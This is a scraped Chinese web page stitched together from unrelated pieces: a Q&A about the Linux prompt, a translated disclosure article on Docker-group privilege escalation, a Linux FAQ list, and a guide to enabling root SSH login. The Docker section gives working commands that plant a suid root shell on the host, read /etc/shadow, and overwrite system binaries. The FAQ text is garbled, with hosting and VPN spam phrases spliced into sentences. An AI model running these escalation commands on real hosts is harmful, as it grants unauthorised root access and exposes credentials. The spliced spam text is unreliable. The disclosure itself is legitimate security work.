在linux下登陆出现[root@ ~]，请问怎么让主机显示出来？谢谢_百度知道
在linux下登陆出现[root@ ~]，请问怎么让主机显示出来？谢谢
默认安装的
我有更好的答案
echo $PS1看看就知道了要去/etc/profile里去加一下,PS1='\u@\h:\w\$'然后source /etc/profile更复杂的就要百度了
采纳率：83%
来自团队：
命令行输入：su 你自己的用户名例如：su 张三
为您推荐：
其他类似问题
aux接口的相关知识
换一换
回答问题，赢新手礼包
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。当前位置： && 知识详情
使用docker命令root主机
是一个很棒的工具，Docker可以使得在装有Linux的系统中用户的创建、管理和运行变得非常简单。篇幅有点长:除了使用Docker容器，你还可以使用docker命令做很多的事情，比如说在主机上创建一个root命令，在容器之外重写系统的配置文件，或者读取一些受限制的东西等等。案例docker&run&-v&$PWD:/stuff&-t&my-docker-image&/bin/sh&-c&\'cp&/bin/sh&/stuff&&&&chown&root.root&/stuff/sh&&&&chmod&a+s&&/stuff/sh'上面这段命令将会加载（-v）用户当前的工作目录$PWD到docker容器中的名为my-docker-image的/stuff目录，并且将会把容器内的/bin/sh复制到/stuff目录中，这样将会更加方便与当前主叫用户的$PWD进行绑定，包括容器外/bin/s的二进制文件，最终与suid一起存入主机中。然后呢？然后这名用户可以执行sh的二进制文件来root主机：test-user@vagrant:~/docker-test$&./shwhoami#&root这名用户唯一需要做的事情就是通过使他自己成为docker&group的一员，然后向docker发送指令。换言之，任何docker&group的成员用户都应该被认为可以root。我私下与安全团队进行了沟通交流，但不幸的是，他们并不认为这是一个漏洞：一名可以链接Docker&API的用户都是授予特权的用户，并且可以拥有root应用程序的所有特权。这是经过设计的，我们目前建议软件操作者考虑给docker&group的所有用户授予最高的权限，用户可以链接docker&group的套件和编程接口。那么，docker&group的作用在哪呢？观点的验证我在Fedora&21（禁用了SELinux）和最新的Ubuntu&14.04（带有apparmor）设备上做了测试。通过Vagrantfile可以使你在虚拟机环境下也能进行测试：Vagrant.configure(&2&)&do&|config|config.vm.box&=&&chef/ubuntu-14.04&end&还有Dockerfile：FROM&debian:wheezyENV&WORKDIR&/stuff&RUN&mkdir&-p&$WORKDIRVOLUME&[&$WORKDIR&]WORKDIR&$WORKDIR跟着步骤来如果你不是一个docker的新手，接下来可能会有点枯燥，你可以直接跳到“乐趣和效益”部分。如果你想继续，那么请先开启Ubuntu设备：vagrant&up按官方提供的要求，安装最新版本的docker包。（）sudo&apt-get&install&wget&-ywget&-qO-&https://get.docker.com/&|&sh添加一个新的非特权用户：adduser&test-user确保将这个新用户添加到docker&group中：sudo&usermod&-aG&docker&test-user注销你刚刚新建的特权用户，并且登录test-user账户：sudo&su&test-usercd&~请用这个新的用户输入下面所有的命令来创建一个docker容器：mkdir&docker-testcd&docker-testcat&&&DockerfileFROM&debian:wheezyENV&WORKDIR&/stuffRUN&mkdir&-p&$WORKDIRVOLUME&[&$WORKDIR&]WORKDIR&$WORKDIR^Ddocker&build&-t&my-docker-image&.乐趣与效益部分你可以从容器中将二进制文件复制到主机内并赋予suid权限：docker&run&-v&$PWD:/stuff&-t&my-docker-image&/bin/sh&-c&\'cp&/bin/sh&/stuff&&&&chown&root.root&/stuff/sh&&&&chmod&a+s&/stuff/sh'./shwhoami#&root你可以将系统目录加载到docker中并且让docker自动读取目录中的内容：docker&run&-v&/etc:/stuff&-t&my-docker-image&/bin/sh&-c&'cat&&shadow'#&root:!:99:7:::#&daemon:*:99:7:::#&bin:*:99:7:::#&...是的，你甚至可以绑定主机的&/，并且可以使用流氓软件重写系统命令：docker&run&-v&/:/stuff&-t&my-docker-image&/bin/sh&-c&\'cp&/stuff/rogue-program&/stuff/bin/cat'或者为之后的接入新建一份特权备份：docker&run&-v&/:/stuff&-t&my-docker-image&/bin/sh&-c&\'cp&/stuff/bin/bash&/stuff/bin/root-shell-ftw&&&&chmod&a+s&/stuff/bin/root-shell-ftw'root-shell-ftw&&-proot-shell-ftw-4.3#但奇怪的是，你既不能读取/dev目录也不能读取/proc目录。因为这将会成为安全性的一个噩梦：docker&run&-v&/:/stuff&-t&my-docker-image&/bin/sh&-c&'cat&/stuff/dev/mem'cat:&/stuff/dev/mem:&Operation&not&permitted所以至少这个问题不会使他人随意操作你的打印机，除非他们找到了root主机的方法。当然这一点他们还是可以做到的。那么，这到底是不是一个安全问题呢?Docker安全团队很明显忽略了安全的含义，这并不是一个漏洞：你应该将任何一个可以在容器内外与docker通信的人视作一个拥有完整权限的用户。所以说，这并不是一次特权升级，因为docker&group本身就是root。这同样是经过设计的，放心吧。我们生活在一个如此奇怪的世界。用户的解决方案如果你担心这个已知的问题，那么你真的应该使用SELinux。关键在于SElinux确实影响了一些docker中最有用的功能，通过使用&-v&从主机的文件系统中读写数据卷宗确实很棒，但是允许使用这个来root主机就另当别论了。SElinux将会禁用-v命令。同样，你也可以避免将docker安装到一台可能含有你的或者其他使用者的敏感信息的机器上，例如密码，SSH密钥，证书密钥等等。你可以使用docker的一个控制适当的一次性虚拟机，就像他们为了在OSX上运行docker时玩的一样。最后请记住，如果你允许他人随意操作docker，意味着你给予了这个人（任何可以以该用户身份执行和控制shell命令的人）通往城堡的钥匙，Docker的人员表示对此并不担忧，并且将其认为是一种类似sudo命令中隐藏密码的行为。无论这种特权升级是否会产生问题，观点因人而异。docker的解决方案·不允许用户加载除docker环境内的任何内容（为什么他么可以绑定/etc目录、/bin目录和/?这样做的目的是什么呢？）。如果这些不可以轻易做到，那么你将会需要提供一个系统配置机制来规定只允许将数据绑定到用户自定义的可信路径上。·对使用当前用户权限写入文件系统并保存的文件进行检测，这样将会修复suid&root的问题。问题披露的时间表·号，私下与供应商联系。·号，得到了供应商的回答：“[…]&我们并不认为那是一个漏洞[…]&这种风险是众所周知的[…]&这是设计好的[…]&”。·号。完整的披露。
本文由 安全客 翻译，转载请注明“转自安全客”，并附上链接。
参与讨论，请先
安全播报APP
Copyright & 360网络攻防实验室 All Rights Reserved 京ICP证080047号[京ICP备号-6]欢迎关注我的新浪微博 @八角石 ！
目前共有 76 个聚合标签
分类 /张 发布于
1、先使用默认用户登录（根据您安装的不同系统，可能是ec2-user/centos等）；
2、创建root的密码，输入如下命令：sudo passwd root ；
3、接下来会提示设置密码（输入过程中不会显示，可以使用PuTTY右键粘贴，粘贴亦不会显示），需要输入两次。
4、接下来，切换到root身份，输入如下命令：su root ；
为了保证安全，未开放root直接登录，以后仍需使用默认用户登录后 su root 并输入密码后切换到 root 。
如果要开放 root 直接登录，请参考以下网址中的介绍。
http://blog.csdn.net/gsying1474/article/details/
欢迎转载分享，转载请注明 来源：大张小站 https://www.vdazhang.com/wenzhang-1148.html若您喜欢这篇文章，欢迎以获得最新内容。 / 欢迎交流探讨，请发电子邮件至 mail[at]vdazhang.com 。
春熙路博客 -
onlineage -不要直接用root用户身份登录系统-云主机--买空间网
| | | | | | | | |
您现在的位置： >>
不要直接用root用户身份登录系统
时间： 3:24:32 点击：
　　核心提示：　　可以参考我们之前的文章：
“Server Reinstall” 重装系统；
如果您需要用搭建SS科学上网的话，
二、点击Vultr后台右侧的蓝色加号，
T22. 如何快速的排序一个文本文件?
可以使用mc这个外包shell调用antiword,即通过查看功能
这个工具...
　　可以参考我们之前的文章：
“Server Reinstall” 重装系统；
如果您需要用搭建SS科学上网的话，
二、点击Vultr后台右侧的蓝色加号，
T22. 如何快速的排序一个文本文件?
可以使用mc这个外包shell调用antiword,即通过查看功能
这个工具就会将word文档内容输出到标准输出。
antiword wordfile
其实美国vpn服务器安装antiword这个工具包,输入
T21. 如何在命令行下查看word文档?
echo 1 & /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -s 192.168.3.0/24 -j SNAT --to218.67.79.7
192.168.3.0/24局域网主机通过WAN连接网络
T20. 如何启用NAT?
host name 即可查看name对应的IP地址
T19. 如何查看一台主机的IP地址?
tcpdump -i interface
T18. 如何抓取网络接口中传输的数据报文?
输入 CTRL-P 向上翻动两行
输入 CTRL-N 向下翻动两行
T17. Lynx你知道快云免流帐号怎么注册文本浏览器如何实现文本行的滚动?
设置 hide_ids=NO
编辑/etc/vsftpd.conff
因为权限受限,无法上传,怎么办?
T16. VsFtpd看着身份服务器登录时,每个文件的owner和group都显示为ftp,
ipcount 192.168.3.2+100
数量为100的所有ip地址前缀
利用 ipcount命令,比如查看起始地址为 192.168.3.2
T15. 如何查看一个IP段范围内的IP地址与前缀?
输入 man -l /path/of/your/man/file
T14. 如何快速查看指定的man文件?
在根目录下输入 du -h --max-depth=1
T13. 看看哪里的虚拟主机好如何快速得到文件系统中各个目录对硬盘的占用情况?
2. ftp用户的HOME目录owner:group要设为root:root,用户才通过匿名访问,否则有500错误
1. 匿名ftp用户登录所见目录对应于系统中ftp用户的HOME目录,一般为/var/ftp,可变更
anonymous_enable=YES
对于vsftpd,编辑/etc/vsftpd.conf,确认开关
T12. vsftpd/wu-ftpd如何启用匿名ftp服务?
echo "512*" | bc
比如,计算硬盘的大小,BLOCK数,每个BLOCK为512字节
T11. 如何快速的执行计算命令?
* Challenge = a random number, encrypted by user's public key
* Host Key 其实云服务器免费永久和 Public Key的关系
* SSH服务器认证这个identity
* 客户登录到远程主机,必须提供identity
T10. SSH远程登录工具,认证过程解析?
lftp 在绝大模拟云主机租用平台多数Linux分发版中都有安装.
lftp 支持断线后自动恢复连接.
lftp 支持下载进度指示,%形式,下载速率.
lftp 工具可以完美的支持,它支持提前信息获取,Tab目录或文件补齐.
T9. 如何高效的使用FTP客户端工具?
正则表达式 ([0-9]{5,}) 代表由5位数字构成的单学会不要直接用root用户身份登录系统词,()是单词控制字符
ll -R | grep "[:alpha:]*[.]c$" | nl |less
分析:.c原文件的特征是以.c字符为结尾,可以使用正则表达是[.]c表示
T8. 如何使用Shell工具链统计一个目录下所有.c的原文件数目?
参考:map &F2&ggA&C-R&=strftime("%Y-%m-%d%A")&CR&&Esc&
可以使用map命令,将某一个快捷键变为命令输入
T7. 如何实现按1个快捷键即输入"年-月-日 星期x"?
Win32下,输入 arp -a
Linux下,输入/sbin/arp
T6. 如何内核中的网络接口卡的物理地址?
Win32下,输入route PRINT
Linux下,输入/sbin/route
T5. 如何查看内核的路由表?
Win32对于香港虚拟主机服务商下,输入tracert HOST_NAME|IP
Linux下,输入traceroute HOST_NAME|IP
T4. 如何跟踪IP报文的路径?
Note: gs is PostScript and PDF language interpreter andpreviewer
gs pdf_file_name
gs ps_file_name3
T3. 如何查看PDF/ps格式的文档?
telnet pc.window.address
T2. Windows2000运行有telnet服务,这样可以使用linux的konsole/或者其他终端模拟器连接windows主机.
注: *NIX环境下, .可代表任何字符, *代表任意匹配,+代表至少出现1次,?代表至多出现1次
gunzip -c ls-lrR.txt.gz | grep 'rms-.*ogg'
举例,有个文件,ls-lrR.txt.gz, 听说云服务器租用价格待查找的字符串为开头为rms,结尾为ogg的文件,可以用下列方式
T1. 使用grep查找.gz文件中包含特定字符串的行?
-------------
About Toolkit
3. 登出桌面系统,再登录,即可正常打开ooffice
export GTK_IM_MODULE=scim-bridge
2. 修改GTK应用程序的输入法配置
projects/scim_bridge
1. 安装scim-bridge模块
时会导致应用程序内存分配错误.
应用比如openoffice, moizlla Thunderbird看看无成本免费云主机是采用C语言实现的,在加载输入法
scim与GTK2的应用程序存在二进制的兼容性问题,scim是c++语言实现的,而gtk2
这里也有描述 https://openoffice/+bug/
系统打开其它应用Mozilla Thunderbird,也是异常退出
2.在KDE应用比如Konsole中可以正常输入中文,但打开open office却异常退出,
export QT_IM_MODULE=scim
export GTK_IM_MODULE=scim
1.系统环境中设置了scim为输入法
S26. 如何解决SCIM和Open Office不兼容,导致Open Office手机连云主机异常退出的问题?
参考 nat.sh
S25. 双网卡如何共享网络连接?
那么很可能路由是罪魁祸首.
default 220.250.26.1 0.0.0.0 UG 0 0 0 eth1
情况下的路由,如果你的缺省路由类似这样
出现这种问题,在查遍了许多文章还没有结果的情况下,请查一下服务器的网络配置,特别小心多网卡
解决: 路由可能是原因
* 就是在mount -t nfs nfs_server:/path /local/path时直接出"mount: RPC: Timedout/n"的错误
* showmount -e nfs_server也没有问题
* 查了portmap, nfs都服务端都没有问题
S24. NFS服务起来后,在客户端mount一直提示"mount: RPC: Timed out/n"?
安装scim输你知道国外云主机推荐入法平台
分解一下看看：
#注：在Dapper里也可以直接选择系统－&系统管理―&语言支持（languagesupport）勾选Chinese 就会自动安装和配置scim
# 注：在Dapper下省略后两步
$sudo chmod +755 /etc/X11/Xsession.d/95xinput
$sudo sh -c " echo 'export XMODIFIERS=@im=SCIM ; exportGTK_IM_MODULE="scim" ; export QT_IM_MODULE="scim" ; scim -d '& /etc/X11/Xsession.d/95xinput "
$sudo apt-get install scim scim-modules-socket scim-modules-tablescim-pinyin scim-tables-zh scim-input-pad
S23. Ubuntu国内免备案云主机下如何支持中文输入?
监测图,PNG格式的,里面包含着启动耗费时间、每一个服务的起止时间.
安装bootchart软件包,之后,每次系统启动完成后会在/var/log/bootchart目录下生成
S22. 如何监控系统从开机到出现登录界面所使用的时间以及系统的运行状态?
extension=session.so
修改/etc/php.ini ,比如你要加载session.so,应写为
S21. PHP许多模块未加香港vps主机租用恒创载,如何加载它们?
就可使mysql服务器在2345级别启动时自动运行
/sbin/chkconfig --level 2345 mysql on
使用/sbin/chkconfig工具,如下
S20. 某些系统服务如mysql数据库未在启动时加载,如何配置启动时加载?
* 重载库 sudo ldconfig
加入一行 /usr/local/lib
* 编辑 /etc/ld.so.conf
2 或将/usr/local/lib添加到系统库目录中
1 修改安装路径为/lib
/usr/local/lib事实上root下,这样就找不到
有一种可能性,即库B不是装在系统的库文件目录/lib和/usr/lib,譬如安装于
S19. 软件A依赖于与库B,我安装了B,可A依然提示库B找不到?
很可能是你的防火墙做了限制,将你要提供的服务从禁用列表中去除即可.
S18. 我的FTP服务或者Web服务别人无法访问到?
可看到指定硬盘设备的分区信息.
输入 fdisk -lu /dev/hdx
S17. 如何快速查看Linux系统的分区信息?
输入 fg 3 或 fg fdisk 回到fdisk任务中
输入 fg 2 或 fg top 回到top任务中
输入 fg 1 或 fg vim 回到vim任务中,继续执行
[]中的数字代表后台任务编号,你可以根据它在任务间来回切换
[5]- Stopped fdisk /dev/hda
[4] Stopped top
[3]+ Stopped vim hello.txt
用户系统输出:
输入: jobs -l
在fdisk中按 CTRL-Z一样挂起它
D. 此时当前运行任务为fdisk,能玩游戏的云电脑挂起的有2个:vim和top
按 CTRL-Z,挂起当前top任务;输入fdisk /dev/hda
C. 用户在top任务中又想看一下硬盘的分区信息
按 CTRL-Z,挂起当前vim任务;输入top
B. 中途用户想退出,查看系统的CPU 运行情况
A. vim hello.txt 编辑一个文档
S16. 相比看如何在单一终端中执行多个任务,并在任务之间切换?
3. 一般刻录一张 560M的CD-ROM,需925.050s
cdrecord -v speed=8 dev=ATAPI:0,0,0 -data boot.iso
2. 需要的话,在dev参数上加 ATAPI指示符,如
cdrecord -scanbus
1. 参数dev=0,0,0是刻录设备的地址,可以如下命令得到
然后和CD-R一样,再使用刻录指令.
cdrecord -v speed=2 dev=0,0,0 -blank=fast
* 对于CD-RW,先要将CD-RW盘的数据内容擦除
一般,cdrecord会使用TAO mode for single session模式.
cdrecord -v speed=4 dev=0,0,0 -data mydata.iso
* 网速不快对于CD-R,假设要刻录的是mydata.iso文件,使用
S15. 如何刻录一张CD-R 或者CD-RW?
docs/=Psyche-docs
RedHat/=shrike-i386-disc2/RedHatRedHat/=shrike-i386-disc3/RedHat
溶合的项目有 .discinfo=.discinfo isolinux/=isolinux
使用到的开关有: -graft-points Psyche-i386-disc1
2. 可以使用mkisofs将多个redhat安装盘合并为一个dvd的安装盘
1. 学习百度开放云是什么制作SVC ISO文件耗时1m45.494s 43.170s(P4,CentOS 4.1)
-input-charset utf-8 /path/of/your/isoroot
-no-emul-boot -boot-load-size 4 -boot-info-table -R -J -v -T/
mkisofs -o output.iso -b isolinux/isolinux.bin -c isolinux/boot.cat/
3. 学会登录使用工具mkisofs
2. 将isolinux目录拷贝至你的ISO光盘的根目录
可从Redhat安装盘上获得
1. 你需要具备以下这些文件, isolinux目录以及目录中的内核,看着网吧主机里面东西太少配置,Ramdisk镜像等
S14.如何制作一张可以启动的CD-ROM?
2. nfs服务依赖于portmap,启动nfs前portmap必须先启动
1. 缺省,在服务器端的共享目录的访问权限即为mount后的访问权限
然后执行: mount -a -t nfs
192.168.12.238:/mnt/asterisk /path/of/client/nfs nfs rw 0
修改 /etc/fstab,增加一条
自动mount:
mount 192.168.12.238:/mnt/asterisk /path/of/client/nfs
手工mount:
客户端设置 (2.2.18以上内核内建支持NFS)
exportfs -ra
如果NFS服务已经启动,那么重读exports
service nfs start
B. 启动NFS服看看务
/mnt/asterisk 192.168.12.0/255.255.255.0(rw)
增加如下条目:
A. 在目标主机上设置NFS 共享目录,修改/etc/exports
服务器端设置 (以CentOS为例)
S13. 如何使用NFS?
route add default 192.168.12.168
免费vps永久添加一条路由
default 192.168.3.1 0.0.0.0 UG 0 0 0 eth0
存在如下的一条路由
S12. 如何给系统增加一个路由?
Linux SVC9000.local 2.6.9-11.ELsmp #1 SMP Wed Jun 8 17:54:20 CDT i686 i386 GNU/Linux
CentOS SMP你看北京主机租用的版本
Linux asterisk1.local 2.6.9-11.EL #1 Wed Jun 8 16:59:52 CDT 6 i386 GNU/Linux
CentOS 分发版
Linux Kernel 共有7454个源文件
anonymous_enable=YES
模拟云主机租用平台看着不要直接用root用户身份登录系统听听免费的云虚拟主机听听不要
作者：Bx酢±丛矗核乘臣业哪瞎现
上一篇：下一篇：
发表我的评论
买空间网() & 2018 版权所有 All Rights Reserved.
www.yaojianwang.com让 root 用户使用 ssh 直接登录主机
1.问题：出于安全原因，默认参数很严格，禁止root用户直接使用ssh登陆
2.解决方法：
2.1.比如先用非root的帐户，登陆到ssh后，su成为root。
2.2.如果想直接用root登陆，则修改如下配置文件：
vi /etc/ssh/sshd_config
注意：这里是ssh【d】_config ，还有一个 ssh_config 两个是不一样的。
找到其中的如下一行，将前边的#符号去掉，并修改no为yes
#PermitRootLogin no
PermitRootLogin yes
接下来执行如下命令重新启动SSH服务：
xxx# service sshd restart
没有更多推荐了，